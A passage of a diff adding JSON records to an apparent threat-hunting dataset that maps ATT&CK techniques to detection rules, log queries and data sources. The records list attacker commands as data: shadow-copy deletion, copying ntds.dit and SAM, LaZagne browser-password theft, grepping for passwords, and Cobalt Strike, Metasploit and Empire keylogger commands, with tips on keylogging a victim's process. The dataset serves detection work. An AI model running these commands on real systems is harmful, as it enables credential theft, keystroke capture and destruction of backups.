+ }, + "detection": { + "selection": { + "CommandLine": [ + "vssadmin.exe Delete Shadows", + "vssadmin create shadow /for=C:", + "copy \\\\?\\GLOBALROOT\\Device\\\\*\\windows\\ntds\\ntds.dit", + "copy \\\\?\\GLOBALROOT\\Device\\\\*\\config\\SAM", + "vssadmin delete shadows /for=C:", + "reg SAVE HKLM\\SYSTEM ", + "esentutl.exe /y /vss *\\ntds.dit*" + ] + }, + "condition": "selection" + }, + "fields": [ + "CommandLine", + "ParentCommandLine" + ], + "falsepositives": [ + "Administrative activity" + ], + "level": "high" + }, + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "200-500", + " 4100-4104", + "PowerShell logs" + ], + [ + "Other Event IDs" + ], + [ + "Memory Forensics" + ], + [ + "API monitoring" + ], + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "200-500", + " 4100-4104", + "PowerShell logs" + ], + [ + "Other Event IDs" + ], + [ + "Memory Forensics" + ], + [ + "API monitoring" + ], + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process access", + "description": "A process was accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process access", + "description": "A process was accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "process" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key access", + "description": "A registry key was accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key access", + "description": "A registry key was accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key access", + "description": "A registry key was accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key access", + "description": "A registry key was accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "windows registry key" + }, + { + "data_source": "active directory", + "definition": "Information associated with the Active Directory service or objects (Such as a user, a group, or a workstation) and activity around them.", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Azure AD" + ], + "data_component": "active directory object access", + "description": "An active directory object was accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "ad object" + }, + { + "data_source": "active directory", + "definition": "Information associated with the Active Directory service or objects (Such as a user, a group, or a workstation) and activity around them.", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Azure AD" + ], + "data_component": "active directory object access", + "description": "An active directory object was accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "ad object" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + } + ], + "external_reference": [ + "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage", + "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", + "https://researchcenter.paloaltonetworks.com/2017/11/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/", + "https://www.cybereason.com/blog/operation-cobalt-kitty-apt", + "https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments", + "https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf", + "https://github.com/Twi1ight/AD-Pentest-Script/blob/master/wmiexec.vbs", + "https://www.clearskysec.com/wp-content/uploads/2016/01/Operation%20DustySky_TLP_WHITE.pdf", + "https://securelist.com/files/2016/07/The-ProjectSauron-APT_research_KL.pdf", + "https://www.justice.gov/file/1080281/download", + "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", + "https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east", + "https://www.brighttalk.com/webcast/10703/296317/apt34-new-targeted-attack-in-the-middle-east", + "https://citizenlab.org/2016/05/stealth-falcon/", + "http://www.symantec.com/connect/blogs/indian-organizations-targeted-suckfly-attacks", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/", + "https://www.youtube.com/watch?v=fevGZs0EQu8", + "https://www.coresecurity.com/corelabs-research/open-source-tools/impacket", + "http://researchcenter.paloaltonetworks.com/2017/04/unit42-oilrig-actors-provide-glimpse-development-testing-efforts/", + "https://s3-us-west-2.amazonaws.com/cymmetria-blog/public/Unveiling_Patchwork.pdf", + "https://www.us-cert.gov/ncas/alerts/TA17-293A", + "https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group", + "https://pan-unit42.github.io/playbook_viewer/", + "https://www2.fireeye.com/WBNR-Know-Your-Enemy-UNC622-Spear-Phishing.html", + "https://www.secureworks.com/research/bronze-union", + "https://www.darkreading.com/analytics/prolific-cybercrime-gang-favors-legit-login-credentials/d/d-id/1322645?", + "http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf", + "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf", + "https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html", + "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf", + "https://www.welivesecurity.com/2018/04/03/lazarus-killdisk-central-american-casino/", + "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html", + "https://www.fireeye.com/blog/threat-research/2019/03/apt40-examining-a-china-nexus-espionage-actor.html", + "http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong", + "https://asert.arbornetworks.com/stolen-pencil-campaign-targets-academia/", + "https://www.fireeye.com/blog/threat-research/2019/04/triton-actor-ttp-profile-custom-attack-tools-detections.html", + "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-ke3chang.pdf", + "https://www.us-cert.gov/ncas/alerts/TA18-074A", + "https://www.fireeye.com/content/dam/collateral/en/mtrends-2018.pdf", + "https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html", + "https://securingtomorrow.mcafee.com/wp-content/uploads/2011/02/McAfee_NightDragon_wp_draft_to_customersv1-1.pdf", + "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf", + "https://securelist.com/poseidon-group-a-targeted-attack-boutique-specializing-in-global-cyber-espionage/73673/", + "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf", + "https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage", + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + [ + "https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/ad-ds-getting-started" + ], + null + ] + }, + { + "technique_id": "T1081", + "command_list": [ + "shell laZagne.exe browsers [-f]", + "grep -riP password #{file_path}", + "grep -riP password /" + ], + "commands": [ + { + "command": "shell laZagne.exe browsers [-f]", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Cobalt Strike" + }, + { + "command": "grep -riP password #{file_path}", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "grep -riP password /", + "source": "Kirtar22/Litmus_Test", + "name": "" + } + ], + "parsed_datasets": [ + { + "Category": "T1081", + "Built-in Windows Command": "", + "Cobalt Strike": "", + "Metasploit": "", + "Description": "https://github.com/hassaanaliw/chromepass\nThis program attempts to collect passwords that Chrome stores." + }, + { + "Category": "T1081", + "Built-in Windows Command": "", + "Cobalt Strike": "shell laZagne.exe browsers [-f]", + "Metasploit": "", + "Description": "https://github.com/AlessandroZ/LaZagne (now part of pupy as a post-exploit module)\nThis program attempts to collect passwords from many different data sources related to browsers - it'll get passwords from Firefox, Chrome, Opera, IE.\nthe -f command on the browsers command call is specifically targeting Firefox" + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1 and (process_command_line contains \"*findstr* /si pass*\"or process_command_line contains \"*select-string -Pattern pass*\"or process_command_line contains \"*list vdir*/text:password*\")", + "name": "Credentials In Files" + }, + { + "product": "Splunk", + "query": "index=linux sourcetype=linux_audit type=execve a0=grep password", + "name": "" + }, + { + "product": "Splunk", + "query": "index=linux sourcetype=\"bash_history\" grep password | table host,user_name,bash_command", + "name": "" + } + ], + "possible_detections": [ + "auditlogs (audit.rules)", + "bash_history logs", + [ + "4663", + "File monitoring" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4663", + "File monitoring" + ], + [ + "4688 ", + "Process CMD Line" + ] + ], + "external_reference": [ + "https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group", + "http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong", + "https://asert.arbornetworks.com/stolen-pencil-campaign-targets-academia/" + ] + }, + { + "technique_id": "T1056", + "command_list": [ + "starting the keylogger:\nkeylogger {x86|x64} {pid}\nwhen you're ready to view logs:\nview -> keylog\nwhen you're done keylogging:\njobs\njobkill {job id number}", + "starting the keylogger:\nkeyscan_start\nwhen you're ready to get the logs:\nkeyscan_dump\nwhen you're done keylogging:\nkeyscan_stop", + "powershell.exe Get-Keystrokes -LogPath C:\\key.log", + "powershell/collection/USBKeylogger", + "powershell/collection/keylogger", + "python/collection/linux/keylogger", + "python/collection/linux/xkeylogger", + "python/collection/osx/keylogger" + ], + "commands": [ + { + "command": "starting the keylogger:\nkeylogger {x86|x64} {pid}\nwhen you're ready to view logs:\nview -> keylog\nwhen you're done keylogging:\njobs\njobkill {job id number}", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Cobalt Strike" + }, + { + "command": "starting the keylogger:\nkeyscan_start\nwhen you're ready to get the logs:\nkeyscan_dump\nwhen you're done keylogging:\nkeyscan_stop", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Metasploit" + }, + { + "command": "powershell.exe Get-Keystrokes -LogPath C:\\key.log", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "powershell/collection/USBKeylogger", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/collection/keylogger", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/collection/linux/keylogger", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/collection/linux/xkeylogger", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/collection/osx/keylogger", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "Category": "T1056", + "Built-in Windows Command": "", + "Cobalt Strike": "starting the keylogger:\nkeylogger {x86|x64} {pid}\nwhen you're ready to view logs:\nview -> keylog\nwhen you're done keylogging:\njobs\njobkill {job id number}", + "Metasploit": "starting the keylogger:\nkeyscan_start\nwhen you're ready to get the logs:\nkeyscan_dump\nwhen you're done keylogging:\nkeyscan_stop", + "Description": "Keylogging is extremely useful to get credentials and other information from the victim, but make sure that you are keylogging in a process belonging to the user you want to spy on. Keylogging within a SYSTEM process will not get you the keystrokes of other users on the system. For Cobalt Strike, make sure you specifiy the correct architecture and PID for a process running as the target victim. For Metasploit, make sure you've migrated to a process that is running as the target victim (explore.exe is always good)." + }, + { + "chain_id": "100132", + "os": "windows", + "parent_process": "powershell.exe", + "commandline_string": "Get-Keystrokes -LogPath C:\\key.log", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "input_capture", + "mitre_attack": "T1056", + "itw_sample": "" + }, + { + "Empire Module": "powershell/collection/USBKeylogger", + "ATT&CK Technique #1": "T1056", + "ATT&CK Technique #2": "", + "Technique": "Input Capture", + "Concatenate for Python Dictionary": "\"powershell/collection/USBKeylogger\": [\"T1056\"]," + }, + { + "Empire Module": "powershell/collection/keylogger", + "ATT&CK Technique #1": "T1056", + "ATT&CK Technique #2": "", + "Technique": "Input Capture", + "Concatenate for Python Dictionary": "\"powershell/collection/keylogger\": [\"T1056\"]," + }, + { + "Empire Module": "python/collection/linux/keylogger", + "ATT&CK Technique #1": "T1056", + "ATT&CK Technique #2": "", + "Technique": "Input Capture", + "Concatenate for Python Dictionary": "\"python/collection/linux/keylogger\": [\"T1056\"]," + }, + { + "Empire Module": "python/collection/linux/xkeylogger", + "ATT&CK Technique #1": "T1056", + "ATT&CK Technique #2": "", + "Technique": "Input Capture", + "Concatenate for Python Dictionary": "\"python/collection/linux/xkeylogger\": [\"T1056\"]," + }, + { + "Empire Module": "python/collection/osx/keylogger", + "ATT&CK Technique #1": "T1056", + "ATT&CK Technique #2": "", + "Technique": "Input Capture", + "Concatenate for Python Dictionary": "\"python/collection/osx/keylogger\": [\"T1056\"]," + } + ], + "queries": [], + "possible_detections": [ + [ + "4657", + "Windows Registry" + ], + [ + "4688", + "Process Execution" + ], + [ + "Kernel drivers" + ], + [ + "API monitoring" + ], + [ + "4657", + "Windows Registry" + ], + [ + "4688", + "Process Execution" + ], + [ + "Kernel drivers" + ], + [ + "API monitoring" + ], + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "driver", + "definition": "Information associated with device drivers, or computer programs that operate or control a particular type of device that is attached to a computer.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Linux", + "macOS", + "Windows" + ], + "data_component": "driver load", + "description": "A driver (User-mode, kernel-mode) was loaded.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "driver" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process metadata", + "description": "Data and information that describe a process (Such as environment variables) and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "process" + } + ], + "external_reference": [ + "https://www.fireeye.com/current-threats/threat-intelligence-reports/rpt-fin4.html", + "https://www2.fireeye.com/WBNR-14Q4NAMFIN4.html", + "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/", + "https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Tools-Report.pdf", + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08070903/darkhotel_kl_07.11.pdf", + "https://content.fireeye.com/apt/rpt-apt38", + "https://www.justice.gov/opa/press-release/file/1121706/download", + 